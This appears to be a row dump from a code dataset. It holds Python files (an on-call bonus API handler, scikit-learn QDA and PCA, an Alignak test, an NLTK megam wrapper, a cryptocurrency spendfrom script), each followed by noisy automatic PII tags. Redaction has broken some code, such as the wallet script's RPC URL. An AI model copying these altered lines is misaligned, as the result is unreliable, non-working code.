oncall_bonus_blacklist = config.get('bonus_blacklist', [])
oncall_bonus_whitelist = config.get('bonus_whitelist', [])
bonus_url = config.get('bonus_url', None)
ldap_grouping = defaultdict(list)
# if start time is not specified only fetch events in the future
if not req.params.get('start__gt'):
req.params['start__gt'] = str(int(time.time()))
get_events(req, resp)
# fetch team data from an externall oncall-bonus api
try:
bonus_response = requests.get(bonus_url)
bonus_response.raise_for_status()
except requests.exceptions.RequestException:
raise HTTPStatus('503 failed to contact oncall-bonus API')
oncall_bonus_teams = bonus_response.json()
for event in json.loads(resp.body):
if event['role'].lower() == 'manager':
continue
team = event['team']
if team in oncall_bonus_whitelist:
ldap_grouping[event['user']].append(event)
continue
if team in oncall_bonus_blacklist:
continue
# check if event's role is payed for that team
team_payment_details = next((item for item in oncall_bonus_teams if item.get('name', '') == team), None)
if team_payment_details:
team_payed_roles = {'primary': team_payment_details.get('primary_paid', 0), 'secondary': team_payment_details.get('secondary_paid', 0)}
if team_payed_roles.get(event['role']):
ldap_grouping[event['user']].append(event)
resp.status = HTTP_200
resp.body = json_dumps(ldap_grouping)
",5345,"[['LOCATION', 'BSD-2'], ['NRP', 'self.config'], ['URL', 'config.ge'], ['URL', 'requests.ge'], ['URL', 'requests.exceptions.Re'], ['PERSON', ""team_payment_details.get('primary_paid""], ['PERSON', ""team_payment_details.get('secondary_paid""], ['PHONE_NUMBER', '1487466146'], ['IP_ADDRESS', ' '], ['IP_ADDRESS', 'de:: '], ['URL', 'self.co'], ['URL', 'example.com'], ['URL', 'self.co'], ['URL', 'config.ge'], ['URL', 'config.ge'], ['URL', 'req.params.ge'], ['URL', 'req.pa'], ['URL', 'resp.bo'], ['URL', 'item.ge'], ['URL', 'details.ge'], ['URL', 'details.ge'], ['URL', 'roles.ge'], ['URL', 'resp.st'], ['URL', 'resp.bo']]"
81,"""""""
Quadratic Discriminant Analysis
""""""
# Author: Matthieu Perrot dummy@email.com
#
# License: BSD Style.
import warnings
import numpy as np
import scipy.ndimage as ndimage
from .base import BaseEstimator, ClassifierMixin
# FIXME :
# - in fit(X, y) method, many checks are common with other models
# (in particular LDA model) and should be factorized:
# maybe in BaseEstimator ?
class QDA(BaseEstimator, ClassifierMixin):
""""""
Quadratic Discriminant Analysis (QDA)
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Training vector, where n_samples in the number of samples and
n_features is the number of features.
y : array, shape = [n_samples]
Target vector relative to X
priors : array, optional, shape = [n_classes]
Priors on classes
Attributes
----------
`means_` : array-like, shape = [n_classes, n_features]
Class means
`priors_` : array-like, shape = [n_classes]
Class priors (sum to 1)
`covariances_` : list of array-like, shape = [n_features, n_features]
Covariance matrices of each class
Examples
--------
>>> from sklearn.qda import QDA
>>> import numpy as np
>>> X = np.array([[-1, -1], [-2, -1], [-3, -2], [1, 1], [2, 1], [3, 2]])
>>> y = np.array([1, 1, 1, 2, 2, 2])
>>> clf = QDA()
>>> clf.fit(X, y)
QDA(priors=None)
>>> print clf.predict([[-0.8, -1]])
[1]
See also
--------
LDA
""""""
def __init__(self, priors=None):
self.priors = np.asarray(priors) if priors is not None else None
def fit(self, X, y, store_covariances=False, tol=1.0e-4):
""""""
Fit the QDA model according to the given training data and parameters.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Training vector, where n_samples in the number of samples and
n_features is the number of features.
y : array, shape = [n_samples]
Target values (integers)
store_covariances : boolean
If True the covariance matrices are computed and stored in the
self.covariances_ attribute.
""""""
X = np.asarray(X)
y = np.asarray(y)
if X.ndim != 2:
raise ValueError('X must be a 2D array')
if X.shape[0] != y.shape[0]:
raise ValueError(
'Incompatible shapes: X has %s samples, while y '
'has %s' % (X.shape[0], y.shape[0]))
if y.dtype.char.lower() not in ('b', 'h', 'i'):
# We need integer values to be able to use
# ndimage.measurements and np.bincount on numpy >= 2.0.
# We currently support (u)int8, (u)int16 and (u)int32.
# Note that versions of scipy >= 0.8 can also accept
# (u)int64. We however don't support it for backwards
# compatibility.
y = y.astype(np.int32)
n_samples, n_features = X.shape
classes = np.unique(y)
n_classes = classes.size
if n_classes < 2:
raise ValueError('y has less than 2 classes')
classes_indices = [(y == c).ravel() for c in classes]
if self.priors is None:
counts = np.array(ndimage.measurements.sum(
np.ones(n_samples, dtype=y.dtype), y, index=classes))
self.priors_ = counts / float(n_samples)
else:
self.priors_ = self.priors
cov = None
if store_covariances:
cov = []
means = []
scalings = []
rotations = []
for group_indices in classes_indices:
Xg = X[group_indices, :]
meang = Xg.mean(0)
means.append(meang)
Xgc = Xg - meang
# Xgc = U * S * V.T
U, S, Vt = np.linalg.svd(Xgc, full_matrices=False)
rank = np.sum(S > tol)
if rank < n_features:
warnings.warn(""Variables are collinear"")
S2 = (S ** 2) / (len(Xg) - 1)
if store_covariances:
# cov = V * (S^2 / (n-1)) * V.T
cov.append(np.dot(S2 * Vt.T, Vt))
scalings.append(S2)
rotations.append(Vt.T)
if store_covariances:
self.covariances_ = cov
self.means_ = np.asarray(means)
self.scalings = np.asarray(scalings)
self.rotations = rotations
self.classes = classes
return self
def decision_function(self, X):
""""""Apply decision function to an array of samples.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Array of samples (test vectors).
Returns
-------
C : array, shape = [n_samples, n_classes]
Decision function values related to each class, per sample.
""""""
X = np.asarray(X)
norm2 = []
for i in range(len(self.classes)):
R = self.rotations[i]
S = self.scalings[i]
Xm = X - self.means_[i]
X2 = np.dot(Xm, R * (S ** (-0.5)))
norm2.append(np.sum(X2 ** 2, 1))
norm2 = np.array(norm2).T # shape = [len(X), n_classes]
return (-0.5 * (norm2 + np.sum(np.log(self.scalings), 1))
+ np.log(self.priors_))
def predict(self, X):
""""""Perform classification on an array of test vectors X.
The predicted class C for each sample in X is returned.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Returns
-------
C : array, shape = [n_samples]
""""""
d = self.decision_function(X)
y_pred = self.classes[d.argmax(1)]
return y_pred
def predict_proba(self, X):
""""""Return posterior probabilities of classification.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Array of samples/test vectors.
Returns
-------
C : array, shape = [n_samples, n_classes]
Posterior probabilities of classification per class.
""""""
values = self.decision_function(X)
# compute the likelihood of the underlying gaussian models
# up to a multiplicative constant.
likelihood = np.exp(values - values.min(axis=1)[:, np.newaxis])
# compute posterior probabilities
return likelihood / likelihood.sum(axis=1)[:, np.newaxis]
def predict_log_proba(self, X):
""""""Return posterior probabilities of classification.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Array of samples/test vectors.
Returns
-------
C : array, shape = [n_samples, n_classes]
Posterior log-probabilities of classification per class.
""""""
# XXX : can do better to avoid precision overflows
probas_ = self.predict_proba(X)
return np.log(probas_)
",7053,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Matthieu Perrot'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'np.asarray(y'], ['PERSON', ""%s'""], ['LOCATION', 'n_samples'], ['PERSON', 'means.append(meang'], ['LOCATION', 'Vt ='], ['NRP', 'V.T'], ['LOCATION', 'Vt'], ['LOCATION', 'rotations.append(Vt'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['NRP', 'gaussian'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['URL', 'email.com'], ['URL', 'np.ar'], ['URL', 'np.ar'], ['URL', 'clf.fi'], ['URL', 'clf.pr'], ['URL', 'self.pr'], ['URL', 'np.as'], ['URL', 'self.co'], ['URL', 'np.as'], ['URL', 'np.as'], ['URL', 'X.sh'], ['URL', 'y.sh'], ['URL', 'X.sh'], ['URL', 'y.sh'], ['URL', 'y.dtype.ch'], ['URL', 'ndimage.me'], ['URL', 'np.bi'], ['URL', 'y.as'], ['URL', 'np.int'], ['URL', 'X.sh'], ['URL', 'classes.si'], ['URL', 'self.pr'], ['URL', 'np.ar'], ['URL', 'ndimage.measurements.su'], ['URL', 'self.pr'], ['URL', 'self.pr'], ['URL', 'self.pr'], ['URL', 'Xg.me'], ['URL', 'np.linalg.sv'], ['URL', 'np.su'], ['URL', 'np.do'], ['URL', 'self.co'], ['URL', 'self.me'], ['URL', 'np.as'], ['URL', 'self.sc'], ['URL', 'np.as'], ['URL', 'self.ro'], ['URL', 'self.cl'], ['URL', 'np.as'], ['URL', 'self.cl'], ['URL', 'self.ro'], ['URL', 'self.sc'], ['URL', 'self.me'], ['URL', 'np.do'], ['URL', 'np.su'], ['URL', 'np.ar'], ['URL', 'np.su'], ['URL', 'self.sc'], ['URL', 'self.pr'], ['URL', 'self.de'], ['URL', 'self.cl'], ['URL', 'd.ar'], ['URL', 'self.de'], ['URL', 'np.ne'], ['URL', 'likelihood.su'], ['URL', 'np.ne'], ['URL', 'self.pr']]"
82,"#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2015-2015: Alignak team, see AUTHORS.txt file for contributors
#
# This file is part of Alignak.
#
# Alignak is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Alignak is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Alignak. If not, see .
#
#
# This file incorporates work covered by the following copyright and
# permission notice:
#
# Copyright (C) 2009-2014:
# Jean Gabes, dummy@email.com
# Hartmut Goebel, dummy@email.com
# Grégory Starck, dummy@email.com
# Zoran Zaric, dummy@email.com
# Sebastien Coavoux, dummy@email.com
# This file is part of Shinken.
#
# Shinken is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Shinken is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Shinken. If not, see .
#
# This file is used to test reading and processing of config files
#
from alignak_test import *
class TestConfig(AlignakTest):
def setUp(self):
self.setup_with_file('etc/alignak_resultmodulation.cfg')
def get_svc(self):
return self.sched.services.find_srv_by_name_and_hostname(""test_host_0"", ""test_ok_0"")
def get_host(self):
return self.sched.hosts.find_by_name(""test_host_0"")
def get_router(self):
return self.sched.hosts.find_by_name(""test_router_0"")
def test_service_resultmodulation(self):
svc = self.get_svc()
host = self.get_host()
router = self.get_router()
self.scheduler_loop(2, [[host, 0, 'UP | value1=1 value2=2'], [svc, 2, 'BAD | value1=0 value2=0'],])
self.assertEqual('UP', host.state)
self.assertEqual('HARD', host.state_type)
# This service got a result modulation. So Criticals are in fact
# Warnings. So even with some CRITICAL (2), it must be warning
self.assertEqual('WARNING', svc.state)
# If we remove the resultmodulations, we should have theclassic behavior
svc.resultmodulations = []
self.scheduler_loop(2, [[host, 0, 'UP | value1=1 value2=2'], [svc, 2, 'BAD | value1=0 value2=0']])
self.assertEqual('CRITICAL', svc.state)
# Now look for the inheritaed thing
# resultmodulation is a inplicit inherited parameter
# and router define it, but not test_router_0/test_ok_0. So this service should also be impacted
svc2 = self.sched.services.find_srv_by_name_and_hostname(""test_router_0"", ""test_ok_0"")
self.assertEqual(router.resultmodulations, svc2.resultmodulations)
self.scheduler_loop(2, [[svc2, 2, 'BAD | value1=0 value2=0']])
self.assertEqual('WARNING', svc2.state)
if __name__ == '__main__':
unittest.main()
",3666,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2015-2015'], ['LOCATION', 'Alignak'], ['LOCATION', 'Alignak'], ['LOCATION', 'Alignak'], ['LOCATION', 'Alignak'], ['LOCATION', 'Alignak'], ['DATE_TIME', '2009-2014'], ['PERSON', 'Jean Gabes'], ['PERSON', 'Hartmut Goebel'], ['PERSON', 'Grégory Starck'], ['PERSON', 'Zoran Zaric'], ['PERSON', 'Sebastien Coavoux'], ['PERSON', 'Shinken'], ['PERSON', 'Shinken'], ['PERSON', 'Shinken'], ['PERSON', 'Shinken'], ['PERSON', 'test_service_resultmodulation(self'], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'self.se'], ['URL', 'resultmodulation.cf'], ['URL', 'self.sched.services.fi'], ['URL', 'self.sched.hosts.fi'], ['URL', 'self.sched.hosts.fi'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'self.sc'], ['URL', 'self.as'], ['URL', 'host.st'], ['URL', 'self.as'], ['URL', 'host.st'], ['URL', 'self.as'], ['URL', 'svc.st'], ['URL', 'svc.re'], ['URL', 'self.sc'], ['URL', 'self.as'], ['URL', 'svc.st'], ['URL', 'self.sched.services.fi'], ['URL', 'self.as'], ['URL', 'router.re'], ['URL', 'svc2.re'], ['URL', 'self.sc'], ['URL', 'self.as'], ['URL', 'svc2.st'], ['URL', 'unittest.ma']]"
83,"# Natural Language Toolkit: Interface to Megam Classifier
#
# Copyright (C) 2001-2010 NLTK Project
# Author: Edward Loper dummy@email.com
# URL:
# For license information, see LICENSE.TXT
#
# $Id: naivebayes.py 2063 2004-07-17 21:02:24Z edloper $
""""""
A set of functions used to interface with the external U{megam
} maxent optimization package.
Before C{megam} can be used, you should tell NLTK where it can find
the C{megam} binary, using the L{config_megam()} function. Typical
usage:
>>> import nltk
>>> nltk.config_megam('.../path/to/megam')
>>> classifier = nltk.MaxentClassifier.train(corpus, 'megam')
""""""
__docformat__ = 'epytext en'
import os
import os.path
import subprocess
from nltk.internals import find_binary
try:
import numpy
except ImportError:
numpy = None
######################################################################
#{ Configuration
######################################################################
_megam_bin = None
def config_megam(bin=None):
""""""
Configure NLTK's interface to the C{megam} maxent optimization
package.
@param bin: The full path to the C{megam} binary. If not specified,
then nltk will search the system for a C{megam} binary; and if
one is not found, it will raise a C{LookupError} exception.
@type bin: C{string}
""""""
global _megam_bin
_megam_bin = find_binary(
'megam', bin,
env_vars=['MEGAM', 'MEGAMHOME'],
binary_names=['megam.opt', 'megam', 'megam_686', 'megam_i686.opt'],
url='http://www.cs.utah.edu/~hal/megam/')
######################################################################
#{ Megam Interface Functions
######################################################################
def write_megam_file(train_toks, encoding, stream,
bernoulli=True, explicit=True):
""""""
Generate an input file for C{megam} based on the given corpus of
classified tokens.
@type train_toks: C{list} of C{tuples} of (C{dict}, C{str})
@param train_toks: Training data, represented as a list of
pairs, the first member of which is a feature dictionary,
and the second of which is a classification label.
@type encoding: L{MaxentFeatureEncodingI}
@param encoding: A feature encoding, used to convert featuresets
into feature vectors.
@type stream: C{stream}
@param stream: The stream to which the megam input file should be
written.
@param bernoulli: If true, then use the 'bernoulli' format. I.e.,
all joint features have binary values, and are listed iff they
are true. Otherwise, list feature values explicitly. If
C{bernoulli=False}, then you must call C{megam} with the
C{-fvals} option.
@param explicit: If true, then use the 'explicit' format. I.e.,
list the features that would fire for any of the possible
labels, for each token. If C{explicit=True}, then you must
call C{megam} with the C{-explicit} option.
""""""
# Look up the set of labels.
labels = encoding.labels()
labelnum = dict([(label, i) for (i, label) in enumerate(labels)])
# Write the file, which contains one line per instance.
for featureset, label in train_toks:
# First, the instance number.
stream.write('%d' % labelnum[label])
# For implicit file formats, just list the features that fire
# for this instance's actual label.
if not explicit:
_write_megam_features(encoding.encode(featureset, label),
stream, bernoulli)
# For explicit formats, list the features that would fire for
# any of the possible labels.
else:
for l in labels:
stream.write(' #')
_write_megam_features(encoding.encode(featureset, l),
stream, bernoulli)
# End of the isntance.
stream.write('\n')
def parse_megam_weights(s, features_count, explicit=True):
""""""
Given the stdout output generated by C{megam} when training a
model, return a C{numpy} array containing the corresponding weight
vector. This function does not currently handle bias features.
""""""
if numpy is None:
raise ValueError('This function requires that numpy be installed')
assert explicit, 'non-explicit not supported yet'
lines = s.strip().split('\n')
weights = numpy.zeros(features_count, 'd')
for line in lines:
if line.strip():
fid, weight = line.split()
weights[int(fid)] = float(weight)
return weights
def _write_megam_features(vector, stream, bernoulli):
if not vector:
raise ValueError('MEGAM classifier requires the use of an '
'always-on feature.')
for (fid, fval) in vector:
if bernoulli:
if fval == 1:
stream.write(' %s' % fid)
elif fval != 0:
raise ValueError('If bernoulli=True, then all'
'features must be binary.')
else:
stream.write(' %s %s' % (fid, fval))
def call_megam(args):
""""""
Call the C{megam} binary with the given arguments.
""""""
if isinstance(args, basestring):
raise TypeError('args should be a list of strings')
if _megam_bin is None:
config_megam()
# Call megam via a subprocess
cmd = [_megam_bin] + args
p = subprocess.Popen(cmd, stdout=subprocess.PIPE)
(stdout, stderr) = p.communicate()
# Check the return code.
if p.returncode != 0:
print
print stderr
raise OSError('megam command failed!')
return stdout
",5800,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['URL', 'http://www.nltk.org/'], ['DATE_TIME', '2001-2010'], ['PERSON', 'Edward Loper'], ['DATE_TIME', '2063 2004-07-17'], ['LOCATION', 'megam_bin'], ['PERSON', 'bin'], ['LOCATION', 'megam_bin'], ['PERSON', 'bin'], ['PERSON', 'megam_i686.opt'], ['PERSON', 'bernoulli=True'], ['LOCATION', 'C{tuples'], ['PERSON', 'bernoulli'], ['PERSON', 'labelnum'], ['PERSON', 'bernoulli'], ['PERSON', 'bernoulli'], ['PERSON', 'bernoulli'], ['LOCATION', 'fid'], ['LOCATION', 'fid'], ['LOCATION', 'megam_bin'], ['URL', 'http://www.cs.utah.edu/~hal/megam/'], ['URL', ""http://www.cs.utah.edu/~hal/megam/'""], ['URL', 'email.com'], ['URL', 'naivebayes.py'], ['URL', 'nltk.co'], ['URL', 'nltk.MaxentClassifier.tr'], ['URL', 'os.pa'], ['URL', 'nltk.int'], ['URL', 'encoding.la'], ['URL', 's.st'], ['URL', 'line.st'], ['URL', 'p.com'], ['URL', 'p.re']]"
84,"#!/usr/bin/env python
#
# Use the raw transactions API to spend ones received on particular addresses,
# and send any change back to that same address.
#
# Example usage:
# spendfrom.py # Lists available funds
# spendfrom.py --from=ADDRESS --to=ADDRESS --amount=11.00
#
# Assumes it will talk to a oned or One-Qt running
# on localhost.
#
# Depends on jsonrpc
#
from decimal import *
import getpass
import math
import os
import os.path
import platform
import sys
import time
from jsonrpc import ServiceProxy, json
BASE_FEE=Decimal(""0.001"")
def check_json_precision():
""""""Make sure json library being used does not lose precision converting BTC values""""""
n = Decimal(""20000000.00000003"")
satoshis = int(json.loads(json.dumps(float(n)))*1.0e8)
if satoshis != 2000000000000003:
raise RuntimeError(""JSON encode/decode loses precision"")
def determine_db_dir():
""""""Return the default location of the One Core data directory""""""
if platform.system() == ""Darwin"":
return os.path.expanduser(""~/Library/Application Support/OneCore/"")
elif platform.system() == ""Windows"":
return os.path.join(os.environ['APPDATA'], ""OneCore"")
return os.path.expanduser(""~/.onecore"")
def read_bitcoin_config(dbdir):
""""""Read the one.conf file from dbdir, returns dictionary of settings""""""
from ConfigParser import SafeConfigParser
class FakeSecHead(object):
def __init__(self, fp):
self.fp = fp
self.sechead = '[all]\n'
def readline(self):
if self.sechead:
try: return self.sechead
finally: self.sechead = None
else:
s = self.fp.readline()
if s.find('#') != -1:
s = s[0:s.find('#')].strip() +""\n""
return s
config_parser = SafeConfigParser()
config_parser.readfp(FakeSecHead(open(os.path.join(dbdir, ""one.conf""))))
return dict(config_parser.items(""all""))
def connect_JSON(config):
""""""Connect to a One Core JSON-RPC server""""""
testnet = config.get('testnet', '0')
testnet = (int(testnet) > 0) # 0/1 in config file, convert to True/False
if not 'rpcport' in config:
config['rpcport'] = 19998 if testnet else 9876
connect = ""http://%s:dummy@email.com:%s""%(config['rpcuser'], config['rpcpassword'], config['rpcport'])
try:
result = ServiceProxy(connect)
# ServiceProxy is lazy-connect, so send an RPC command mostly to catch connection errors,
# but also make sure the oned we're talking to is/isn't testnet:
if result.getmininginfo()['testnet'] != testnet:
sys.stderr.write(""RPC server at ""+connect+"" testnet setting mismatch\n"")
sys.exit(1)
return result
except:
sys.stderr.write(""Error connecting to RPC server at ""+connect+""\n"")
sys.exit(1)
def unlock_wallet(oned):
info = oned.getinfo()
if 'unlocked_until' not in info:
return True # wallet is not encrypted
t = int(info['unlocked_until'])
if t <= time.time():
try:
passphrase = getpass.getpass(""Wallet is locked; enter passphrase: "")
oned.walletpassphrase(passphrase, 5)
except:
sys.stderr.write(""Wrong passphrase\n"")
info = oned.getinfo()
return int(info['unlocked_until']) > time.time()
def list_available(oned):
address_summary = dict()
address_to_account = dict()
for info in oned.listreceivedbyaddress(0):
address_to_account[info[""address""]] = info[""account""]
unspent = oned.listunspent(0)
for output in unspent:
# listunspent doesn't give addresses, so:
rawtx = oned.getrawtransaction(output['txid'], 1)
vout = rawtx[""vout""][output['vout']]
pk = vout[""scriptPubKey""]
# This code only deals with ordinary pay-to-one-address
# or pay-to-script-hash outputs right now; anything exotic is ignored.
if pk[""type""] != ""pubkeyhash"" and pk[""type""] != ""scripthash"":
continue
address = pk[""addresses""][0]
if address in address_summary:
address_summary[address][""total""] += vout[""value""]
address_summary[address][""outputs""].append(output)
else:
address_summary[address] = {
""total"" : vout[""value""],
""outputs"" : [output],
""account"" : address_to_account.get(address, """")
}
return address_summary
def select_coins(needed, inputs):
# Feel free to improve this, this is good enough for my simple needs:
outputs = []
have = Decimal(""0.0"")
n = 0
while have < needed and n < len(inputs):
outputs.append({ ""txid"":inputs[n][""txid""], ""vout"":inputs[n][""vout""]})
have += inputs[n][""amount""]
n += 1
return (outputs, have-needed)
def create_tx(oned, fromaddresses, toaddress, amount, fee):
all_coins = list_available(oned)
total_available = Decimal(""0.0"")
needed = amount+fee
potential_inputs = []
for addr in fromaddresses:
if addr not in all_coins:
continue
potential_inputs.extend(all_coins[addr][""outputs""])
total_available += all_coins[addr][""total""]
if total_available < needed:
sys.stderr.write(""Error, only %f BTC available, need %f\n""%(total_available, needed));
sys.exit(1)
#
# Note:
# Python's json/jsonrpc modules have inconsistent support for Decimal numbers.
# Instead of wrestling with getting json.dumps() (used by jsonrpc) to encode
# Decimals, I'm casting amounts to float before sending them to oned.
#
outputs = { toaddress : float(amount) }
(inputs, change_amount) = select_coins(needed, potential_inputs)
if change_amount > BASE_FEE: # don't bother with zero or tiny change
change_address = fromaddresses[-1]
if change_address in outputs:
outputs[change_address] += float(change_amount)
else:
outputs[change_address] = float(change_amount)
rawtx = oned.createrawtransaction(inputs, outputs)
signed_rawtx = oned.signrawtransaction(rawtx)
if not signed_rawtx[""complete""]:
sys.stderr.write(""signrawtransaction failed\n"")
sys.exit(1)
txdata = signed_rawtx[""hex""]
return txdata
def compute_amount_in(oned, txinfo):
result = Decimal(""0.0"")
for vin in txinfo['vin']:
in_info = oned.getrawtransaction(vin['txid'], 1)
vout = in_info['vout'][vin['vout']]
result = result + vout['value']
return result
def compute_amount_out(txinfo):
result = Decimal(""0.0"")
for vout in txinfo['vout']:
result = result + vout['value']
return result
def sanity_test_fee(oned, txdata_hex, max_fee):
class FeeError(RuntimeError):
pass
try:
txinfo = oned.decoderawtransaction(txdata_hex)
total_in = compute_amount_in(oned, txinfo)
total_out = compute_amount_out(txinfo)
if total_in-total_out > max_fee:
raise FeeError(""Rejecting transaction, unreasonable fee of ""+str(total_in-total_out))
tx_size = len(txdata_hex)/2
kb = tx_size/1000 # integer division rounds down
if kb > 1 and fee < BASE_FEE:
raise FeeError(""Rejecting no-fee transaction, larger than 1000 bytes"")
if total_in < 0.01 and fee < BASE_FEE:
raise FeeError(""Rejecting no-fee, tiny-amount transaction"")
# Exercise for the reader: compute transaction priority, and
# warn if this is a very-low-priority transaction
except FeeError as err:
sys.stderr.write((str(err)+""\n""))
sys.exit(1)
def main():
import optparse
parser = optparse.OptionParser(usage=""%prog [options]"")
parser.add_option(""--from"", dest=""fromaddresses"", default=None,
help=""addresses to get ones from"")
parser.add_option(""--to"", dest=""to"", default=None,
help=""address to get send ones to"")
parser.add_option(""--amount"", dest=""amount"", default=None,
help=""amount to send"")
parser.add_option(""--fee"", dest=""fee"", default=""0.0"",
help=""fee to include"")
parser.add_option(""--datadir"", dest=""datadir"", default=determine_db_dir(),
help=""location of one.conf file with RPC username/password (default: %default)"")
parser.add_option(""--testnet"", dest=""testnet"", default=False, action=""store_true"",
help=""Use the test network"")
parser.add_option(""--dry_run"", dest=""dry_run"", default=False, action=""store_true"",
help=""Don't broadcast the transaction, just create and print the transaction data"")
(options, args) = parser.parse_args()
check_json_precision()
config = read_bitcoin_config(options.datadir)
if options.testnet: config['testnet'] = True
oned = connect_JSON(config)
if options.amount is None:
address_summary = list_available(oned)
for address,info in address_summary.iteritems():
n_transactions = len(info['outputs'])
if n_transactions > 1:
print(""%s %.8f %s (%d transactions)""%(address, info['total'], info['account'], n_transactions))
else:
print(""%s %.8f %s""%(address, info['total'], info['account']))
else:
fee = Decimal(options.fee)
amount = Decimal(options.amount)
while unlock_wallet(oned) == False:
pass # Keep asking for passphrase until they get it right
txdata = create_tx(oned, options.fromaddresses.split("",""), options.to, amount, fee)
sanity_test_fee(oned, txdata, amount*Decimal(""0.01""))
if options.dry_run:
print(txdata)
else:
txid = oned.sendrawtransaction(txdata)
print(txid)
if __name__ == '__main__':
main()
",9912,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['NRP', 'spendfrom.py'], ['NRP', 'spendfrom.py'], ['LOCATION', 'jsonrpc'], ['LOCATION', 'json'], ['PERSON', 'json'], ['PERSON', 'platform.system'], ['PERSON', 'Darwin'], ['PERSON', 'config_parser = SafeConfigParser'], ['NRP', 'address_to_account'], ['LOCATION', 'fromaddresses'], ['PERSON', 'fromaddresses'], ['NRP', 'float(amount'], ['PERSON', 'FeeError(""Rejecting'], ['PERSON', 'FeeError(""Rejecting'], ['PERSON', 'FeeError(""Rejecting'], ['PERSON', 'one.conf'], ['PERSON', 'txdata = create_tx(oned'], ['PERSON', 'options.fromaddresses.split'], ['URL', 'spendfrom.py'], ['URL', 'spendfrom.py'], ['URL', 'os.pa'], ['URL', 'platform.sy'], ['URL', 'os.pa'], ['URL', 'platform.sy'], ['URL', 'os.path.jo'], ['URL', 'os.pa'], ['URL', 'one.co'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'self.fp.re'], ['URL', 's.fi'], ['URL', 's.fi'], ['URL', 'parser.re'], ['URL', 'os.path.jo'], ['URL', 'one.co'], ['URL', 'parser.it'], ['URL', 'config.ge'], ['URL', 'email.com'], ['URL', 'result.ge'], ['URL', 'sys.st'], ['URL', 'sys.st'], ['URL', 'oned.ge'], ['URL', 'getpass.ge'], ['URL', 'sys.st'], ['URL', 'oned.ge'], ['URL', 'oned.li'], ['URL', 'oned.li'], ['URL', 'oned.ge'], ['URL', 'account.ge'], ['URL', 'sys.st'], ['URL', 'oned.cr'], ['URL', 'oned.si'], ['URL', 'sys.st'], ['URL', 'oned.ge'], ['URL', 'oned.de'], ['URL', 'sys.st'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'one.co'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.pa'], ['URL', 'options.am'], ['URL', 'summary.it'], ['URL', 'options.am'], ['URL', 'options.fr'], ['URL', 'options.to'], ['URL', 'oned.se']]"
85,""""""" Principal Component Analysis
""""""
# Author: Alexandre Gramfort dummy@email.com
# Olivier Grisel dummy@email.com
# Mathieu Blondel dummy@email.com
# Denis A. Engemann dummy@email.com
#
# License: BSD 3 clause
from math import log, sqrt
import warnings
import numpy as np
from scipy import linalg
from scipy.special import gammaln
from ..base import BaseEstimator, TransformerMixin
from ..utils import array2d, check_random_state, as_float_array
from ..utils import atleast2d_or_csr
from ..utils.extmath import fast_logdet, safe_sparse_dot, randomized_svd, \
fast_dot
def _assess_dimension_(spectrum, rank, n_samples, n_features):
""""""Compute the likelihood of a rank ``rank`` dataset
The dataset is assumed to be embedded in gaussian noise of shape(n,
dimf) having spectrum ``spectrum``.
Parameters
----------
spectrum: array of shape (n)
data spectrum
rank: int,
tested rank value
n_samples: int,
number of samples
dim: int,
embedding/empirical dimension
Returns
-------
ll: float,
The log-likelihood
Notes
-----
This implements the method of `Thomas P. Minka:
Automatic Choice of Dimensionality for PCA. NIPS 2000: 598-604`
""""""
if rank > len(spectrum):
raise ValueError(""The tested rank cannot exceed the rank of the""
"" dataset"")
pu = -rank * log(2.)
for i in range(rank):
pu += (gammaln((n_features - i) / 2.)
- log(np.pi) * (n_features - i) / 2.)
pl = np.sum(np.log(spectrum[:rank]))
pl = -pl * n_samples / 2.
if rank == n_features:
pv = 0
v = 1
else:
v = np.sum(spectrum[rank:]) / (n_features - rank)
pv = -np.log(v) * n_samples * (n_features - rank) / 2.
m = n_features * rank - rank * (rank + 1.) / 2.
pp = log(2. * np.pi) * (m + rank + 1.) / 2.
pa = 0.
spectrum_ = spectrum.copy()
spectrum_[rank:n_features] = v
for i in range(rank):
for j in range(i + 1, len(spectrum)):
pa += log((spectrum[i] - spectrum[j]) *
(1. / spectrum_[j] - 1. / spectrum_[i])) + log(n_samples)
